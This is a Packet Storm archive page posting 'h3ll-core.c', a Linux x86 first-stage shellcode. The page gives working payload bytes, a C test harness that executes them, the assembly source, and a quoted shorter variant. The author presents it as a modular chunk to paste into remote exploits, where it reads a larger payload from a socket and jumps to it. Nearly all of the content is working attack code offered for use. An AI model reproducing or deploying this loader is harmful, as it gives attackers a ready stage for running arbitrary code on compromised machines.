exploit the possibilities

h3ll-core.c

h3ll-core.c
Posted Nov 8, 2005
Authored by Charles Stevenson | Site bokeoa.com

if(read(fd,buf,512)<=2) _exit(1) else buf(); shellcode for Linux x86. h3ll-core.s is appended.

tags | x86, shellcode
systems | linux
MD5 | 5643743d10693800b28954d82ed00a38

h3ll-core.c

Change Mirror Download
/* h3ll-core.c by Charles Stevenson <core@bokeoa.com> 
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it as a first stage payload when I desire to
* follow up with a real large payload of goodness. This actually
* is a bit larger than necessary because of the error checking but
* in some cases prooves nice. For a tiny version of the same theme
* check out mcb's 14 byte (saving of 15 bytes for all you
* mathematician's out there ;). The only problem might be that his
* reads from stdin and can only reads 385 bytes less than mine. So
* If you like to go big on the shellcode use mine... otherwise here's
* mcb's (or comment out the delimited lines below to shrink mine):
*
* "\x6a\x03\x58\x31\xdb\x6a\x7f\x5a\x89\xe1\xcd\x80\xff\xe4"
*
* I assume the file descriptor is in %esi. Since that's where it
* was on the last exploit I wrote. Change the instruction to
* the appropriate register from your fndsckcode or put an int in
* there for and fd that's always the same.
*/
char hellcode[] = /* if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core */
// uncomment the following line to raise SIGTRAP in gdb
// "\xcc" // int3
// 22 bytes:
// if (read(fd,buf,512) <= 0x2) _exit(1) else buf();
"\x31\xdb" // xor %ebx,%ebx
"\xf7\xe3" // mul %ebx
"\x42" // inc %edx
"\xc1\xe2\x09" // shl $0x9,%edx
"\x31\xf3" // xor %esi,%ebx // (optional assumes fd in esi)
"\x04\x03" // add $0x3,%al
"\x54" // push %esp
"\x59" // pop %ecx
"\xcd\x80" // int $0x80
"\x3c\x02" // cmp $0x02,%al // (optional error check)
"\x7e\x02" // jle exit // (optional exit clean)
"\xff\xe1" // jmp *%ecx
// 7 bytes _exit(1) (optional _exit(1);)
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
;

int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte if(read(fd,buf,512)<=2) _exit(1) else buf(); linux/x86 by core\n\tNOTE: w/optional 11 bytes check and exit (recommend unless no room)\n",
strlen(hellcode));
shell();
return 0;
}

# h3ll.s by core@bokeoa.com based on some code zen-parse helped me to
# write a few years ago.. this is especially tuned for pulltheplug fu
# challenge #3 it read's 512 bytes of shellcode onto the stack and calls
# it and i also implemented some error checking!

.globl main
main:
int3 # SIGTRAP to gdb
xor %ebx,%ebx
mul %ebx
inc %edx # 1 << 9 == 512 bytes
shl $0x9,%edx #
xor %esi, %ebx # fd stored in %esi
add $0x3,%al # __NR_read
push %esp # pointer to sp
pop %ecx #
int $0x80 # count = read(fd,buf,512)
cmpb $0x2, %al # if (0x2 <= count)
jle exit # _exit(1)
jmp *%ecx # else buf()
exit:
xor %eax,%eax
inc %eax
mov %eax,%ebx
int $0x80

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close